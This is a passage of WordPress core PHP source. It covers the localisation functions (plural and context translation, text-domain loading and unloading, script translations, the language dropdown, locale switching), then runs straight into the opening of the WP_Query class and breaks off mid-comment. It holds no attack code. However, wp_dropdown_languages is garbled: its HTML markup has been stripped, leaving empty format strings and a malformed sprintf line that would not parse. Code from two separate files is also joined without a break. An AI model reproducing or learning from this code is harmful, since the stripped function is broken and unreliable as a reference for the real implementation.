hybrid of _n() and _x(). It supports context and plurals. * * Used when you want to use the appropriate form of a string with context based on whether a * number is singular or plural. * * Example of a generic phrase which is disambiguated via the context parameter: * * printf( _nx( '%s group', '%s groups', $people, 'group of people', 'text-domain' ), number_format_i18n( $people ) ); * printf( _nx( '%s group', '%s groups', $animals, 'group of animals', 'text-domain' ), number_format_i18n( $animals ) ); * * @since 2.8.0 * * @param string $single The text to be used if the number is singular. * @param string $plural The text to be used if the number is plural. * @param int $number The number to compare against to use either the singular or plural form. * @param string $context Context information for the translators. * @param string $domain Optional. Text domain. Unique identifier for retrieving translated strings. * Default 'default'. * @return string The translated singular or plural form. */ function _nx( $single, $plural, $number, $context, $domain = 'default' ) { $translations = get_translations_for_domain( $domain ); $translation = $translations->translate_plural( $single, $plural, $number, $context ); /** * Filters the singular or plural form of a string with gettext context. * * @since 2.8.0 * * @param string $translation Translated text. * @param string $single The text to be used if the number is singular. * @param string $plural The text to be used if the number is plural. * @param string $number The number to compare against to use either the singular or plural form. * @param string $context Context information for the translators. * @param string $domain Text domain. Unique identifier for retrieving translated strings. */ return apply_filters( 'ngettext_with_context', $translation, $single, $plural, $number, $context, $domain ); } /** * Registers plural strings in POT file, but does not translate them. * * Used when you want to keep structures with translatable plural * strings and use them later when the number is known. * * Example: * * $message = _n_noop( '%s post', '%s posts', 'text-domain' ); * ... * printf( translate_nooped_plural( $message, $count, 'text-domain' ), number_format_i18n( $count ) ); * * @since 2.5.0 * * @param string $singular Singular form to be localized. * @param string $plural Plural form to be localized. * @param string $domain Optional. Text domain. Unique identifier for retrieving translated strings. * Default null. * @return array { * Array of translation information for the strings. * * @type string $0 Singular form to be localized. No longer used. * @type string $1 Plural form to be localized. No longer used. * @type string $singular Singular form to be localized. * @type string $plural Plural form to be localized. * @type null $context Context information for the translators. * @type string $domain Text domain. * } */ function _n_noop( $singular, $plural, $domain = null ) { return array( 0 => $singular, 1 => $plural, 'singular' => $singular, 'plural' => $plural, 'context' => null, 'domain' => $domain, ); } /** * Registers plural strings with gettext context in POT file, but does not translate them. * * Used when you want to keep structures with translatable plural * strings and use them later when the number is known. * * Example of a generic phrase which is disambiguated via the context parameter: * * $messages = array( * 'people' => _nx_noop( '%s group', '%s groups', 'people', 'text-domain' ), * 'animals' => _nx_noop( '%s group', '%s groups', 'animals', 'text-domain' ), * ); * ... * $message = $messages[ $type ]; * printf( translate_nooped_plural( $message, $count, 'text-domain' ), number_format_i18n( $count ) ); * * @since 2.8.0 * * @param string $singular Singular form to be localized. * @param string $plural Plural form to be localized. * @param string $context Context information for the translators. * @param string $domain Optional. Text domain. Unique identifier for retrieving translated strings. * Default null. * @return array { * Array of translation information for the strings. * * @type string $0 Singular form to be localized. No longer used. * @type string $1 Plural form to be localized. No longer used. * @type string $2 Context information for the translators. No longer used. * @type string $singular Singular form to be localized. * @type string $plural Plural form to be localized. * @type string $context Context information for the translators. * @type string $domain Text domain. * } */ function _nx_noop( $singular, $plural, $context, $domain = null ) { return array( 0 => $singular, 1 => $plural, 2 => $context, 'singular' => $singular, 'plural' => $plural, 'context' => $context, 'domain' => $domain, ); } /** * Translates and retrieves the singular or plural form of a string that's been registered * with _n_noop() or _nx_noop(). * * Used when you want to use a translatable plural string once the number is known. * * Example: * * $message = _n_noop( '%s post', '%s posts', 'text-domain' ); * ... * printf( translate_nooped_plural( $message, $count, 'text-domain' ), number_format_i18n( $count ) ); * * @since 3.1.0 * * @param array $nooped_plural Array with singular, plural, and context keys, usually the result of _n_noop() or _nx_noop(). * @param int $count Number of objects. * @param string $domain Optional. Text domain. Unique identifier for retrieving translated strings. If $nooped_plural contains * a text domain passed to _n_noop() or _nx_noop(), it will override this value. Default 'default'. * @return string Either $single or $plural translated text. */ function translate_nooped_plural( $nooped_plural, $count, $domain = 'default' ) { if ( $nooped_plural['domain'] ) { $domain = $nooped_plural['domain']; } if ( $nooped_plural['context'] ) { return _nx( $nooped_plural['singular'], $nooped_plural['plural'], $count, $nooped_plural['context'], $domain ); } else { return _n( $nooped_plural['singular'], $nooped_plural['plural'], $count, $domain ); } } /** * Load a .mo file into the text domain $domain. * * If the text domain already exists, the translations will be merged. If both * sets have the same string, the translation from the original value will be taken. * * On success, the .mo file will be placed in the $l10n global by $domain * and will be a MO object. * * @since 1.5.0 * * @global MO[] $l10n An array of all currently loaded text domains. * @global MO[] $l10n_unloaded An array of all text domains that have been unloaded again. * * @param string $domain Text domain. Unique identifier for retrieving translated strings. * @param string $mofile Path to the .mo file. * @return bool True on success, false on failure. */ function load_textdomain( $domain, $mofile ) { global $l10n, $l10n_unloaded; $l10n_unloaded = (array) $l10n_unloaded; /** * Filters whether to override the .mo file loading. * * @since 2.9.0 * * @param bool $override Whether to override the .mo file loading. Default false. * @param string $domain Text domain. Unique identifier for retrieving translated strings. * @param string $mofile Path to the MO file. */ $plugin_override = apply_filters( 'override_load_textdomain', false, $domain, $mofile ); if ( true == $plugin_override ) { unset( $l10n_unloaded[ $domain ] ); return true; } /** * Fires before the MO translation file is loaded. * * @since 2.9.0 * * @param string $domain Text domain. Unique identifier for retrieving translated strings. * @param string $mofile Path to the .mo file. */ do_action( 'load_textdomain', $domain, $mofile ); /** * Filters MO file path for loading translations for a specific text domain. * * @since 2.9.0 * * @param string $mofile Path to the MO file. * @param string $domain Text domain. Unique identifier for retrieving translated strings. */ $mofile = apply_filters( 'load_textdomain_mofile', $mofile, $domain ); if ( ! is_readable( $mofile ) ) { return false; } $mo = new MO(); if ( ! $mo->import_from_file( $mofile ) ) { return false; } if ( isset( $l10n[ $domain ] ) ) { $mo->merge_with( $l10n[ $domain ] ); } unset( $l10n_unloaded[ $domain ] ); $l10n[ $domain ] = &$mo; return true; } /** * Unload translations for a text domain. * * @since 3.0.0 * * @global MO[] $l10n An array of all currently loaded text domains. * @global MO[] $l10n_unloaded An array of all text domains that have been unloaded again. * * @param string $domain Text domain. Unique identifier for retrieving translated strings. * @return bool Whether textdomain was unloaded. */ function unload_textdomain( $domain ) { global $l10n, $l10n_unloaded; $l10n_unloaded = (array) $l10n_unloaded; /** * Filters whether to override the text domain unloading. * * @since 3.0.0 * * @param bool $override Whether to override the text domain unloading. Default false. * @param string $domain Text domain. Unique identifier for retrieving translated strings. */ $plugin_override = apply_filters( 'override_unload_textdomain', false, $domain ); if ( $plugin_override ) { $l10n_unloaded[ $domain ] = true; return true; } /** * Fires before the text domain is unloaded. * * @since 3.0.0 * * @param string $domain Text domain. Unique identifier for retrieving translated strings. */ do_action( 'unload_textdomain', $domain ); if ( isset( $l10n[ $domain ] ) ) { unset( $l10n[ $domain ] ); $l10n_unloaded[ $domain ] = true; return true; } return false; } /** * Load default translated strings based on locale. * * Loads the .mo file in WP_LANG_DIR constant path from WordPress root. * The translated (.mo) file is named based on the locale. * * @see load_textdomain() * * @since 1.5.0 * * @param string $locale Optional. Locale to load. Default is the value of get_locale(). * @return bool Whether the textdomain was loaded. */ function load_default_textdomain( $locale = null ) { if ( null === $locale ) { $locale = determine_locale(); } // Unload previously loaded strings so we can switch translations. unload_textdomain( 'default' ); $return = load_textdomain( 'default', WP_LANG_DIR . "/$locale.mo" ); if ( ( is_multisite() || ( defined( 'WP_INSTALLING_NETWORK' ) && WP_INSTALLING_NETWORK ) ) && ! file_exists( WP_LANG_DIR . "/admin-$locale.mo" ) ) { load_textdomain( 'default', WP_LANG_DIR . "/ms-$locale.mo" ); return $return; } if ( is_admin() || wp_installing() || ( defined( 'WP_REPAIRING' ) && WP_REPAIRING ) ) { load_textdomain( 'default', WP_LANG_DIR . "/admin-$locale.mo" ); } if ( is_network_admin() || ( defined( 'WP_INSTALLING_NETWORK' ) && WP_INSTALLING_NETWORK ) ) { load_textdomain( 'default', WP_LANG_DIR . "/admin-network-$locale.mo" ); } return $return; } /** * Loads a plugin's translated strings. * * If the path is not given then it will be the root of the plugin directory. * * The .mo file should be named based on the text domain with a dash, and then the locale exactly. * * @since 1.5.0 * @since 4.6.0 The function now tries to load the .mo file from the languages directory first. * * @param string $domain Unique identifier for retrieving translated strings * @param string|false $deprecated Optional. Deprecated. Use the $plugin_rel_path parameter instead. * Default false. * @param string|false $plugin_rel_path Optional. Relative path to WP_PLUGIN_DIR where the .mo file resides. * Default false. * @return bool True when textdomain is successfully loaded, false otherwise. */ function load_plugin_textdomain( $domain, $deprecated = false, $plugin_rel_path = false ) { /** * Filters a plugin's locale. * * @since 3.0.0 * * @param string $locale The plugin's current locale. * @param string $domain Text domain. Unique identifier for retrieving translated strings. */ $locale = apply_filters( 'plugin_locale', determine_locale(), $domain ); $mofile = $domain . '-' . $locale . '.mo'; // Try to load from the languages directory first. if ( load_textdomain( $domain, WP_LANG_DIR . '/plugins/' . $mofile ) ) { return true; } if ( false !== $plugin_rel_path ) { $path = WP_PLUGIN_DIR . '/' . trim( $plugin_rel_path, '/' ); } elseif ( false !== $deprecated ) { _deprecated_argument( __FUNCTION__, '2.7.0' ); $path = ABSPATH . trim( $deprecated, '/' ); } else { $path = WP_PLUGIN_DIR; } return load_textdomain( $domain, $path . '/' . $mofile ); } /** * Load the translated strings for a plugin residing in the mu-plugins directory. * * @since 3.0.0 * @since 4.6.0 The function now tries to load the .mo file from the languages directory first. * * @param string $domain Text domain. Unique identifier for retrieving translated strings. * @param string $mu_plugin_rel_path Optional. Relative to `WPMU_PLUGIN_DIR` directory in which the .mo * file resides. Default empty string. * @return bool True when textdomain is successfully loaded, false otherwise. */ function load_muplugin_textdomain( $domain, $mu_plugin_rel_path = '' ) { /** This filter is documented in wp-includes/l10n.php */ $locale = apply_filters( 'plugin_locale', determine_locale(), $domain ); $mofile = $domain . '-' . $locale . '.mo'; // Try to load from the languages directory first. if ( load_textdomain( $domain, WP_LANG_DIR . '/plugins/' . $mofile ) ) { return true; } $path = WPMU_PLUGIN_DIR . '/' . ltrim( $mu_plugin_rel_path, '/' ); return load_textdomain( $domain, $path . '/' . $mofile ); } /** * Load the theme's translated strings. * * If the current locale exists as a .mo file in the theme's root directory, it * will be included in the translated strings by the $domain. * * The .mo files must be named based on the locale exactly. * * @since 1.5.0 * @since 4.6.0 The function now tries to load the .mo file from the languages directory first. * * @param string $domain Text domain. Unique identifier for retrieving translated strings. * @param string $path Optional. Path to the directory containing the .mo file. * Default false. * @return bool True when textdomain is successfully loaded, false otherwise. */ function load_theme_textdomain( $domain, $path = false ) { /** * Filters a theme's locale. * * @since 3.0.0 * * @param string $locale The theme's current locale. * @param string $domain Text domain. Unique identifier for retrieving translated strings. */ $locale = apply_filters( 'theme_locale', determine_locale(), $domain ); $mofile = $domain . '-' . $locale . '.mo'; // Try to load from the languages directory first. if ( load_textdomain( $domain, WP_LANG_DIR . '/themes/' . $mofile ) ) { return true; } if ( ! $path ) { $path = get_template_directory(); } return load_textdomain( $domain, $path . '/' . $locale . '.mo' ); } /** * Load the child themes translated strings. * * If the current locale exists as a .mo file in the child themes * root directory, it will be included in the translated strings by the $domain. * * The .mo files must be named based on the locale exactly. * * @since 2.9.0 * * @param string $domain Text domain. Unique identifier for retrieving translated strings. * @param string $path Optional. Path to the directory containing the .mo file. * Default false. * @return bool True when the theme textdomain is successfully loaded, false otherwise. */ function load_child_theme_textdomain( $domain, $path = false ) { if ( ! $path ) { $path = get_stylesheet_directory(); } return load_theme_textdomain( $domain, $path ); } /** * Loads the script translated strings. * * @since 5.0.0 * @since 5.0.2 Uses load_script_translations() to load translation data. * @since 5.1.0 The `$domain` parameter was made optional. * * @see WP_Scripts::set_translations() * * @param string $handle Name of the script to register a translation domain to. * @param string $domain Optional. Text domain. Default 'default'. * @param string $path Optional. The full file path to the directory containing translation files. * * @return false|string False if the script textdomain could not be loaded, the translated strings * in JSON encoding otherwise. */ function load_script_textdomain( $handle, $domain = 'default', $path = null ) { $wp_scripts = wp_scripts(); if ( ! isset( $wp_scripts->registered[ $handle ] ) ) { return false; } $path = untrailingslashit( $path ); $locale = determine_locale(); // If a path was given and the handle file exists simply return it. $file_base = $domain === 'default' ? $locale : $domain . '-' . $locale; $handle_filename = $file_base . '-' . $handle . '.json'; if ( $path ) { $translations = load_script_translations( $path . '/' . $handle_filename, $handle, $domain ); if ( $translations ) { return $translations; } } $src = $wp_scripts->registered[ $handle ]->src; if ( ! preg_match( '|^(https?:)?//|', $src ) && ! ( $wp_scripts->content_url && 0 === strpos( $src, $wp_scripts->content_url ) ) ) { $src = $wp_scripts->base_url . $src; } $relative = false; $languages_path = WP_LANG_DIR; $src_url = wp_parse_url( $src ); $content_url = wp_parse_url( content_url() ); $site_url = wp_parse_url( site_url() ); // If the host is the same or it's a relative URL. if ( strpos( $src_url['path'], $content_url['path'] ) === 0 && ( ! isset( $src_url['host'] ) || $src_url['host'] === $content_url['host'] ) ) { // Make the src relative the specific plugin or theme. $relative = trim( substr( $src_url['path'], strlen( $content_url['path'] ) ), '/' ); $relative = explode( '/', $relative ); $languages_path = WP_LANG_DIR . '/' . $relative[0]; $relative = array_slice( $relative, 2 ); $relative = implode( '/', $relative ); } elseif ( ! isset( $src_url['host'] ) || $src_url['host'] === $site_url['host'] ) { if ( ! isset( $site_url['path'] ) ) { $relative = trim( $src_url['path'], '/' ); } elseif ( ( strpos( $src_url['path'], trailingslashit( $site_url['path'] ) ) === 0 ) ) { // Make the src relative to the WP root. $relative = substr( $src_url['path'], strlen( $site_url['path'] ) ); $relative = trim( $relative, '/' ); } } /** * Filters the relative path of scripts used for finding translation files. * * @since 5.0.2 * * @param string $relative The relative path of the script. False if it could not be determined. * @param string $src The full source url of the script. */ $relative = apply_filters( 'load_script_textdomain_relative_path', $relative, $src ); // If the source is not from WP. if ( false === $relative ) { return load_script_translations( false, $handle, $domain ); } // Translations are always based on the unminified filename. if ( substr( $relative, -7 ) === '.min.js' ) { $relative = substr( $relative, 0, -7 ) . '.js'; } $md5_filename = $file_base . '-' . md5( $relative ) . '.json'; if ( $path ) { $translations = load_script_translations( $path . '/' . $md5_filename, $handle, $domain ); if ( $translations ) { return $translations; } } $translations = load_script_translations( $languages_path . '/' . $md5_filename, $handle, $domain ); if ( $translations ) { return $translations; } return load_script_translations( false, $handle, $domain ); } /** * Loads the translation data for the given script handle and text domain. * * @since 5.0.2 * * @param string|false $file Path to the translation file to load. False if there isn't one. * @param string $handle Name of the script to register a translation domain to. * @param string $domain The text domain. * @return string|false The JSON-encoded translated strings for the given script handle and text domain. False if there are none. */ function load_script_translations( $file, $handle, $domain ) { /** * Pre-filters script translations for the given file, script handle and text domain. * * Returning a non-null value allows to override the default logic, effectively short-circuiting the function. * * @since 5.0.2 * * @param string|false $translations JSON-encoded translation data. Default null. * @param string|false $file Path to the translation file to load. False if there isn't one. * @param string $handle Name of the script to register a translation domain to. * @param string $domain The text domain. */ $translations = apply_filters( 'pre_load_script_translations', null, $file, $handle, $domain ); if ( null !== $translations ) { return $translations; } /** * Filters the file path for loading script translations for the given script handle and text domain. * * @since 5.0.2 * * @param string|false $file Path to the translation file to load. False if there isn't one. * @param string $handle Name of the script to register a translation domain to. * @param string $domain The text domain. */ $file = apply_filters( 'load_script_translation_file', $file, $handle, $domain ); if ( ! $file || ! is_readable( $file ) ) { return false; } $translations = file_get_contents( $file ); /** * Filters script translations for the given file, script handle and text domain. * * @since 5.0.2 * * @param string $translations JSON-encoded translation data. * @param string $file Path to the translation file that was loaded. * @param string $handle Name of the script to register a translation domain to. * @param string $domain The text domain. */ return apply_filters( 'load_script_translations', $translations, $file, $handle, $domain ); } /** * Loads plugin and theme textdomains just-in-time. * * When a textdomain is encountered for the first time, we try to load * the translation file from `wp-content/languages`, removing the need * to call load_plugin_texdomain() or load_theme_texdomain(). * * @since 4.6.0 * @access private * * @see get_translations_for_domain() * @global MO[] $l10n_unloaded An array of all text domains that have been unloaded again. * * @param string $domain Text domain. Unique identifier for retrieving translated strings. * @return bool True when the textdomain is successfully loaded, false otherwise. */ function _load_textdomain_just_in_time( $domain ) { global $l10n_unloaded; $l10n_unloaded = (array) $l10n_unloaded; // Short-circuit if domain is 'default' which is reserved for core. if ( 'default' === $domain || isset( $l10n_unloaded[ $domain ] ) ) { return false; } $translation_path = _get_path_to_translation( $domain ); if ( false === $translation_path ) { return false; } return load_textdomain( $domain, $translation_path ); } /** * Gets the path to a translation file for loading a textdomain just in time. * * Caches the retrieved results internally. * * @since 4.7.0 * @access private * * @see _load_textdomain_just_in_time() * @staticvar array $available_translations * * @param string $domain Text domain. Unique identifier for retrieving translated strings. * @param bool $reset Whether to reset the internal cache. Used by the switch to locale functionality. * @return string|false The path to the translation file or false if no translation file was found. */ function _get_path_to_translation( $domain, $reset = false ) { static $available_translations = array(); if ( true === $reset ) { $available_translations = array(); } if ( ! isset( $available_translations[ $domain ] ) ) { $available_translations[ $domain ] = _get_path_to_translation_from_lang_dir( $domain ); } return $available_translations[ $domain ]; } /** * Gets the path to a translation file in the languages directory for the current locale. * * Holds a cached list of available .mo files to improve performance. * * @since 4.7.0 * @access private * * @see _get_path_to_translation() * @staticvar array $cached_mofiles * * @param string $domain Text domain. Unique identifier for retrieving translated strings. * @return string|false The path to the translation file or false if no translation file was found. */ function _get_path_to_translation_from_lang_dir( $domain ) { static $cached_mofiles = null; if ( null === $cached_mofiles ) { $cached_mofiles = array(); $locations = array( WP_LANG_DIR . '/plugins', WP_LANG_DIR . '/themes', ); foreach ( $locations as $location ) { $mofiles = glob( $location . '/*.mo' ); if ( $mofiles ) { $cached_mofiles = array_merge( $cached_mofiles, $mofiles ); } } } $locale = determine_locale(); $mofile = "{$domain}-{$locale}.mo"; $path = WP_LANG_DIR . '/plugins/' . $mofile; if ( in_array( $path, $cached_mofiles ) ) { return $path; } $path = WP_LANG_DIR . '/themes/' . $mofile; if ( in_array( $path, $cached_mofiles ) ) { return $path; } return false; } /** * Return the Translations instance for a text domain. * * If there isn't one, returns empty Translations instance. * * @since 2.8.0 * * @global MO[] $l10n * @staticvar NOOP_Translations $noop_translations * * @param string $domain Text domain. Unique identifier for retrieving translated strings. * @return Translations|NOOP_Translations A Translations instance. */ function get_translations_for_domain( $domain ) { global $l10n; if ( isset( $l10n[ $domain ] ) || ( _load_textdomain_just_in_time( $domain ) && isset( $l10n[ $domain ] ) ) ) { return $l10n[ $domain ]; } static $noop_translations = null; if ( null === $noop_translations ) { $noop_translations = new NOOP_Translations; } return $noop_translations; } /** * Whether there are translations for the text domain. * * @since 3.0.0 * * @global MO[] $l10n * * @param string $domain Text domain. Unique identifier for retrieving translated strings. * @return bool Whether there are translations. */ function is_textdomain_loaded( $domain ) { global $l10n; return isset( $l10n[ $domain ] ); } /** * Translates role name. * * Since the role names are in the database and not in the source there * are dummy gettext calls to get them into the POT file and this function * properly translates them back. * * The before_last_bar() call is needed, because older installations keep the roles * using the old context format: 'Role name|User role' and just skipping the * content after the last bar is easier than fixing them in the DB. New installations * won't suffer from that problem. * * @since 2.8.0 * @since 5.2.0 Added the `$domain` parameter. * * @param string $name The role name. * @param string $domain Optional. Text domain. Unique identifier for retrieving translated strings. * Default 'default'. * @return string Translated role name on success, original name on failure. */ function translate_user_role( $name, $domain = 'default' ) { return translate_with_gettext_context( before_last_bar( $name ), 'User role', $domain ); } /** * Get all available languages based on the presence of *.mo files in a given directory. * * The default directory is WP_LANG_DIR. * * @since 3.0.0 * @since 4.7.0 The results are now filterable with the {@see 'get_available_languages'} filter. * * @param string $dir A directory to search for language files. * Default WP_LANG_DIR. * @return array An array of language codes or an empty array if no languages are present. Language codes are formed by stripping the .mo extension from the language file names. */ function get_available_languages( $dir = null ) { $languages = array(); $lang_files = glob( ( is_null( $dir ) ? WP_LANG_DIR : $dir ) . '/*.mo' ); if ( $lang_files ) { foreach ( $lang_files as $lang_file ) { $lang_file = basename( $lang_file, '.mo' ); if ( 0 !== strpos( $lang_file, 'continents-cities' ) && 0 !== strpos( $lang_file, 'ms-' ) && 0 !== strpos( $lang_file, 'admin-' ) ) { $languages[] = $lang_file; } } } /** * Filters the list of available language codes. * * @since 4.7.0 * * @param array $languages An array of available language codes. * @param string $dir The directory where the language files were found. */ return apply_filters( 'get_available_languages', $languages, $dir ); } /** * Get installed translations. * * Looks in the wp-content/languages directory for translations of * plugins or themes. * * @since 3.7.0 * * @param string $type What to search for. Accepts 'plugins', 'themes', 'core'. * @return array Array of language data. */ function wp_get_installed_translations( $type ) { if ( $type !== 'themes' && $type !== 'plugins' && $type !== 'core' ) { return array(); } $dir = 'core' === $type ? '' : "/$type"; if ( ! is_dir( WP_LANG_DIR ) ) { return array(); } if ( $dir && ! is_dir( WP_LANG_DIR . $dir ) ) { return array(); } $files = scandir( WP_LANG_DIR . $dir ); if ( ! $files ) { return array(); } $language_data = array(); foreach ( $files as $file ) { if ( '.' === $file[0] || is_dir( WP_LANG_DIR . "$dir/$file" ) ) { continue; } if ( substr( $file, -3 ) !== '.po' ) { continue; } if ( ! preg_match( '/(?:(.+)-)?([a-z]{2,3}(?:_[A-Z]{2})?(?:_[a-z0-9]+)?).po/', $file, $match ) ) { continue; } if ( ! in_array( substr( $file, 0, -3 ) . '.mo', $files ) ) { continue; } list( , $textdomain, $language ) = $match; if ( '' === $textdomain ) { $textdomain = 'default'; } $language_data[ $textdomain ][ $language ] = wp_get_pomo_file_data( WP_LANG_DIR . "$dir/$file" ); } return $language_data; } /** * Extract headers from a PO file. * * @since 3.7.0 * * @param string $po_file Path to PO file. * @return array PO file headers. */ function wp_get_pomo_file_data( $po_file ) { $headers = get_file_data( $po_file, array( 'POT-Creation-Date' => '"POT-Creation-Date', 'PO-Revision-Date' => '"PO-Revision-Date', 'Project-Id-Version' => '"Project-Id-Version', 'X-Generator' => '"X-Generator', ) ); foreach ( $headers as $header => $value ) { // Remove possible contextual '\n' and closing double quote. $headers[ $header ] = preg_replace( '~(\\\n)?"$~', '', $value ); } return $headers; } /** * Language selector. * * @since 4.0.0 * @since 4.3.0 Introduced the `echo` argument. * @since 4.7.0 Introduced the `show_option_site_default` argument. * @since 5.1.0 Introduced the `show_option_en_us` argument. * * @see get_available_languages() * @see wp_get_available_translations() * * @param string|array $args { * Optional. Array or string of arguments for outputting the language selector. * * @type string $id ID attribute of the select element. Default 'locale'. * @type string $name Name attribute of the select element. Default 'locale'. * @type array $languages List of installed languages, contain only the locales. * Default empty array. * @type array $translations List of available translations. Default result of * wp_get_available_translations(). * @type string $selected Language which should be selected. Default empty. * @type bool|int $echo Whether to echo the generated markup. Accepts 0, 1, or their * boolean equivalents. Default 1. * @type bool $show_available_translations Whether to show available translations. Default true. * @type bool $show_option_site_default Whether to show an option to fall back to the site's locale. Default false. * @type bool $show_option_en_us Whether to show an option for English (United States). Default true. * } * @return string HTML content */ function wp_dropdown_languages( $args = array() ) { $parsed_args = wp_parse_args( $args, array( 'id' => 'locale', 'name' => 'locale', 'languages' => array(), 'translations' => array(), 'selected' => '', 'echo' => 1, 'show_available_translations' => true, 'show_option_site_default' => false, 'show_option_en_us' => true, ) ); // Bail if no ID or no name. if ( ! $parsed_args['id'] || ! $parsed_args['name'] ) { return; } // English (United States) uses an empty string for the value attribute. if ( 'en_US' === $parsed_args['selected'] ) { $parsed_args['selected'] = ''; } $translations = $parsed_args['translations']; if ( empty( $translations ) ) { require_once( ABSPATH . 'wp-admin/includes/translation-install.php' ); $translations = wp_get_available_translations(); } /* * $parsed_args['languages'] should only contain the locales. Find the locale in * $translations to get the native name. Fall back to locale. */ $languages = array(); foreach ( $parsed_args['languages'] as $locale ) { if ( isset( $translations[ $locale ] ) ) { $translation = $translations[ $locale ]; $languages[] = array( 'language' => $translation['language'], 'native_name' => $translation['native_name'], 'lang' => current( $translation['iso'] ), ); // Remove installed language from available translations. unset( $translations[ $locale ] ); } else { $languages[] = array( 'language' => $locale, 'native_name' => $locale, 'lang' => '', ); } } $translations_available = ( ! empty( $translations ) && $parsed_args['show_available_translations'] ); // Holds the HTML markup. $structure = array(); // List installed languages. if ( $translations_available ) { $structure[] = ''; } // Site default. if ( $parsed_args['show_option_site_default'] ) { $structure[] = sprintf( '', selected( 'site-default', $parsed_args['selected'], false ), _x( 'Site Default', 'default site language' ) ); } if ( $parsed_args['show_option_en_us'] ) { $structure[] = sprintf( '', selected( '', $parsed_args['selected'], false ) ); } // List installed languages. foreach ( $languages as $language ) { $structure[] = sprintf( '', esc_attr( $language['language'] ), esc_attr( $language['lang'] ), selected( $language['language'], $parsed_args['selected'], false ), esc_html( $language['native_name'] ) ); } if ( $translations_available ) { $structure[] = ''; } // List available translations. if ( $translations_available ) { $structure[] = ''; foreach ( $translations as $translation ) { $structure[] = sprintf( '', esc_attr( $translation['language'] ), esc_attr( current( $translation['iso'] ) ), selected( $translation['language'], $parsed_args['selected'], false ), esc_html( $translation['native_name'] ) ); } $structure[] = ''; } // Combine the output string. $output = sprintf( ''; if ( $parsed_args['echo'] ) { echo $output; } return $output; } /** * Determines whether the current locale is right-to-left (RTL). * * For more information on this and similar theme functions, check out * the {@link https://developer.wordpress.org/themes/basics/conditional-tags/ * Conditional Tags} article in the Theme Developer Handbook. * * @since 3.0.0 * * @global WP_Locale $wp_locale * * @return bool Whether locale is RTL. */ function is_rtl() { global $wp_locale; if ( ! ( $wp_locale instanceof WP_Locale ) ) { return false; } return $wp_locale->is_rtl(); } /** * Switches the translations according to the given locale. * * @since 4.7.0 * * @global WP_Locale_Switcher $wp_locale_switcher * * @param string $locale The locale. * @return bool True on success, false on failure. */ function switch_to_locale( $locale ) { /* @var WP_Locale_Switcher $wp_locale_switcher */ global $wp_locale_switcher; return $wp_locale_switcher->switch_to_locale( $locale ); } /** * Restores the translations according to the previous locale. * * @since 4.7.0 * * @global WP_Locale_Switcher $wp_locale_switcher * * @return string|false Locale on success, false on error. */ function restore_previous_locale() { /* @var WP_Locale_Switcher $wp_locale_switcher */ global $wp_locale_switcher; return $wp_locale_switcher->restore_previous_locale(); } /** * Restores the translations according to the original locale. * * @since 4.7.0 * * @global WP_Locale_Switcher $wp_locale_switcher * * @return string|false Locale on success, false on error. */ function restore_current_locale() { /* @var WP_Locale_Switcher $wp_locale_switcher */ global $wp_locale_switcher; return $wp_locale_switcher->restore_current_locale(); } /** * Whether switch_to_locale() is in effect. * * @since 4.7.0 * * @global WP_Locale_Switcher $wp_locale_switcher * * @return bool True if the locale has been switched, false otherwise. */ function is_locale_switched() { /* @var WP_Locale_Switcher $wp_locale_switcher */ global $wp_locale_switcher; return $wp_locale_switcher->is_switched(); } /** * Query API: WP_Query class * * @package WordPress * @subpackage Query * @since 4.7.0 */ /** * The WordPress Query class. * * @link https://codex.wordpress.org/Function_Reference/WP_Query Codex page. * * @since 1.5.0 * @since 4.5.0 Removed the `$comments_popup` property. */ class WP_Query { /** * Query vars set by the user * * @since 1.5.0 * @var array */ public $query; /** * Query vars, after parsing * * @since 1.5.0 * @var array */ public $query_vars = array(); /** * Taxonomy query, as passed to get_tax_sql() * * @since 3.1.0 * @var object WP_Tax_Query */ public $tax_query; /** * Metadata query container * * @since 3.2.0 * @var object WP_Meta_Query */ public $meta_query = false; /** * Date query container * * @since 3.7.0 * @var object WP_Date_Query */ public $date_query = false; /** * Holds the data for a single object that is queried. * * Holds the contents of a post, page, category, attachment. * * @since 1.5.0 * @var object|array */ public $queried_object; /** * The ID of the queried object. * * @since 1.5.0 * @var int */ public $queried_object_id; /** * Get post database query. * * @since 2.0.1 * @var string */ public $request; /** * List of posts. * * @since 1.5.0 * @var array */ public $posts; /** * The amount of posts for the current query. * * @since 1.5.0 * @var int */ public $post_count = 0; /** * Index of the current item in the loop. * * @since 1.5.0 * @var int */ public $current_post = -1; /** * Whether the loop has started and the caller is in the loop. * * @since 2.0.0 * @var bool */ public $in_the_loop = false; /** * The current post. * * @since 1.5.0 * @var WP_Post */ public $post; /** * The list of comments for current post. * * @since 2.2.0 * @var array */ public $comments; /** * The amount of comments for the posts. * * @since 2.2.0 * @var int */ public $comment_count = 0; /** * The index of the comment in the comment loop. * * @since 2.2.0 * @var int */ public $current_comment = -1; /** * Current comment ID. * * @since 2.2.0 * @var int */ public $comment; /** * The amount of found posts for the current query. * * If limit clause was not used, equals $post_count. * * @since 2.1.0 * @var int */ public $found_posts = 0; /** * The amount of pages. * * @since 2.1.0 * @var int */ public $max_num_pages = 0; /** * The amount of comment pages. * * @since 2.7.0 * @var int */ public $max_num_comment_pages = 0; /** * Signifies whether the current query is for a single post. * * @since 1.5.0 * @var bool */ public $is_single = false; /** * Signifies whether the current query is for a preview. * * @since 2.0.0 * @var bool */ public $is_preview = false; /** * Signifies whether the current query is for a page. * * @since 1.5.0 * @var bool */ public $is_page = false; /** * Signifies whether the current query is for an archive. * * @since 1.5.0 * @var bool */ public $is_archive = false; /** * Signifies whether the current query is for a date archive. * * @since 1.5.0 * @var bool */ public $is_date = false; /** * Signifies whether the current query is for a year archive. * * @since 1.5.0 * @var bool */ public $is_year = false; /** * Signifies whether the current query is for a month archive. * * @since 1.5.0 * @var bool */ public $is_month = false; /** * Signifies whether the current query is for a day archive. * * @since 1.5.0 * @var bool */ public $is_day = false; /** * Signifies whether the current query is for a specific time. * * @since 1.5.0 * @var bool */ public $is_time = false; /** * Signifies whether the current query is for an author archive. * * @since 1.5.0 * @var bool */ public $is_author = false; /** * Signifies whether the current query is for a category archive. * * @since 1.5.0 * @var bool */ public $is_category = false; /** * Signifies whether the current query is for a tag archive. * * @since 2.3.0 * @var bool */ public $is_tag = false; /** * Signifies whether the current query is for a taxonomy archive. * * @since 2.5.0 * @var bool */ public $is_tax = false; /** * Signifies whether the current query is for a search. * * @since 1.5.0 * @var bool */ public $is_search = false; /** * Signifies whether the current query is for a feed. * * @since 1.5.0 * @var bool */ public $is_feed = false; /** * Signifies whether the current query is for a comment feed. * * @since 2.2.0 * @var bool */ public $is_comment_feed = false; /** * Signifies whether the current query is for 